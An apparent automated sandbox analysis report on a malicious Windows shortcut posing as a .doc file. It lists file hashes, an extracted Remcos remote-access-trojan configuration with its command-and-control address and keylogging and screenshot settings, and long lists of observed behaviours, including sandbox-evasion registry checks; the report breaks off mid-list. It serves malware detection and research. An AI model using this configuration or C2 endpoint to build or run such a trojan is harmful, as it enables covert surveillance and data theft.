Resubmissions
29/08/2024, 11:25
240829-nh9xrs1bll 1029/08/2024, 10:50
240829-mxlcaaxdmh 1029/08/2024, 10:06
240829-l5ghmawbkg 1029/08/2024, 09:04
240829-k13dvstaqb 1029/08/2024, 08:36
240829-khyyqavaqn 10Analysis
-
max time kernel
1799s -
max time network
1801s -
platform
windows10-1703_x64 -
resource
win10-20240404-uk -
resource tags
arch:x64arch:x86image:win10-20240404-uklocale:uk-uaos:windows10-1703-x64systemwindows -
submitted
29/08/2024, 10:50
Static task
static1
Behavioral task
behavioral1
Sample
brt_1_0147.doc.lnk
Resource
win10-20240404-uk
General
-
Target
brt_1_0147.doc.lnk
-
Size
47KB
-
MD5
8b3dc64090b0b26eda4f1195f493160d
-
SHA1
bd0b4c1d9e8b84465714287727ba5293f9a8eb61
-
SHA256
cb43e05491b09d4c7da14d3f42d11a2bb4fa81b0fb47717d44c75426832cdf30
-
SHA512
ddbe1ad300d613531b6ffcb9a8ff607b1e6e7cf676ce738c31d138e6154ff0ee3c1b8d4d8b67c8fec5da444c845b62475736c228eb89d3b013a3ddcb15365deb
-
SSDEEP
48:88muavUQSbXTo87Cj3YMEDo/FoZaxCogDDo/LX7LdCZZGXu/dZZIa7x:88y8Nkgm3hX+UxCgLX7BuqQ
Malware Config
Extracted
remcos
feetfuck
83.222.191.201:24251
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-XTJ1YO
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 1 4512 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion regedit.exe -
Executes dropped EXE 2 IoCs
pid Process 2968 Newfts.exe 1344 Newfts.exe -
Loads dropped DLL 8 IoCs
pid Process 2968 Newfts.exe 2968 Newfts.exe 2968 Newfts.exe 2968 Newfts.exe 1344 Newfts.exe 1344 Newfts.exe 1344 Newfts.exe 1344 Newfts.exe -
Maps connected drives based on registry 3 TTPs 6 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\Count regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\NextInstance regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum regedit.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum regedit.exe Key value enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum regedit.exe -
Remote Services: SMB/Windows Admin Shares 1 TTPs 1 IoCs
Adversaries may use Valid Accounts to interact with a remote network share using Server Message Block (SMB).
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\LanmanServer\Parameters\NullSessionPipes regedit.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\taskschd.msc mmc.exe File opened for modification C:\Windows\system32\taskschd.msc mmc.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1344 set thread context of 2780 1344 Newfts.exe 77 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\rescache\_merged\4183903823\2290032291.pri taskmgr.exe File created C:\Windows\rescache\_merged\1601268389\715946058.pri taskmgr.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh regedit.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh regedit.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh regedit.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh regedit.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh regedit.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh regedit.exe -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language regedit.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language regedit.exe Key value enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Newfts.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Newfts.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ClassGUID regedit.exe Key value enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs regedit.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Storport regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Service regedit.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Driver regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Storport\InitialTimestamp regedit.exe Key value enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters\Storport regedit.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ClassGUID regedit.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ContainerID regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Mfg regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters\Storport regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Address regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters\Storport regedit.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Address regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Driver regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 regedit.exe Key value enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters\Storport regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities regedit.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters\Storport\InitialTimestamp regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ConfigFlags regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters\DefaultRequestFlags regedit.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr regedit.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ConfigFlags regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Service regedit.exe Key value enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\LocationInformation regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\HardwareID regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 regedit.exe Key value enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Storport regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags regedit.exe Key value enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters\DefaultRequestFlags regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters\Storport\PowerCycleCount regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Service regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName regedit.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\ContainerID regedit.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Address regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\Attributes regedit.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc regedit.exe -
Checks processor information in registry 2 TTPs 38 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 perfmon.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz perfmon.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor regedit.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Enumerates system info in registry 2 TTPs 64 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\Component Information regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2\Identifier regedit.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0\Identifier regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BootArchitecture regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral regedit.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BiosMinorRelease regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVendor regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\Component Information regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1\Component Information regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2\Configuration Data regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0\Component Information regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 regedit.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0\Identifier regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1\Component Information regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0\Configuration Data regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Component Information regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 regedit.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Component Information regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1\Configuration Data regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\ regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Configuration Data regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ECFirmwareMajorRelease regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\Configuration Data regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1\Identifier regedit.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\Identifier regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2\Component Information regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000\ regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor regedit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter regedit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct regedit.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 regedit.exe Key value queried 